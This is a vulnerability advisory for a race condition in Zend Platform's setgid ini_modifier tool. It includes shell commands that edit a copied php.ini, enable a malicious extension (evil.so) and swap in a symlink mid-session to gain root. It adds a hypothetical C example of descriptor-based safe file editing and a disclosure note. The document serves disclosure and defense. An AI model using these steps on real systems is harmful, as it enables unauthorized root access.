Zend Platform comes with an ini_modifier that is used by the GUI to alter the php.ini file. By abusing a vulnerability within the ini_modifier it is possible for a local attacker to edit the php.ini file without knowing the necessary GUI password. This can be used to obtain root privileges, for example by adding a malicious PHP extension to the php.ini and waiting for the next server restart.
During the installation of the Zend Platform a setgid binary called ini_modifier is installed.
$ ls -la /usr/local/Zend/sbin/ini_modifier
-rwxr-sr-x 1 root zendtech 243240 2006-08-14 16:24 ini_modifier
The purpose of this binary is to edit the system-wide php.ini file from within the GUI. To protect ini_modifier from abuse it first prompts for the GUI password before it lets you edit anything. While it is possible to read the MD5 hash of the GUI password from the php.ini and crack it with a dictionary or rainbow table attack, there is an even simpler method that exploits a vulnerability within the ini_modifier.
Because ini_modifier can be told to open an alternative php.ini file with the -f parameter, it is possible to edit a copy of the system php.ini after changing the Zend GUI password hash in that copy with an ordinary editor.
$ cd /tmp
$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
... now edit zend_gui_password in the copy to an MD5 of your choice and
... REMEMBER the old MD5
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
In a parallel session you now perform the following:
$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini
Then continue editing the ini file in the first session and verify the result:
$ cat /usr/local/Zend/etc/php.ini
The next time the webserver is restarted the injected malicious Zend Extension will be loaded and executed with root permissions.
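The underlying defect is a check-then-write race: the file named by -f is verified (password check) first and written by path later, so the path can be redirected in between. As an added illustration of the defensive pattern, not code from Zend's ini_modifier, here is a hypothetical privileged config editor that opens the target once, verifies it through the descriptor, and writes back through that same descriptor; the path is never resolved a second time, and O_NOFOLLOW additionally refuses a symlink as the final component. The `owner` argument (root for a real setgid tool) and the file paths are assumptions for the self-test.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` for editing. Refuses a symlink in the final component,
 * non-regular files, files not owned by `owner`, and files writable by
 * group or other. Returns a descriptor or -1. Hypothetical, not Zend code. */
int open_config_safely(const char *path, uid_t owner) {
    int fd = open(path, O_RDWR | O_NOFOLLOW);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Replace the file's content through an already-verified descriptor. The
 * path is not consulted again, so swapping a directory for a symlink after
 * the verification step (the race described above) has no effect. */
int write_back(int fd, const char *content) {
    size_t len = strlen(content);
    if (ftruncate(fd, 0) < 0 || lseek(fd, 0, SEEK_SET) < 0) return -1;
    while (len > 0) {
        ssize_t n = write(fd, content, len);
        if (n <= 0) return -1;
        content += n;
        len -= (size_t)n;
    }
    return fsync(fd);
}

/* Whole edit: verify once, then write via the same descriptor. A real tool
 * would perform its password check on the data read from `fd` in between. */
int edit_config(const char *path, const char *content, uid_t owner) {
    int fd = open_config_safely(path, owner);
    if (fd < 0) return -1;
    int rc = write_back(fd, content);
    close(fd);
    return rc;
}
```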
Proof of concept, exploit or instructions to reproduce
This issue was disclosed to Zend at the end of January 2007. Zend has since provided an update for the ini_modifier on their site; however, their recommendation is to upgrade to Zend Platform 3.0.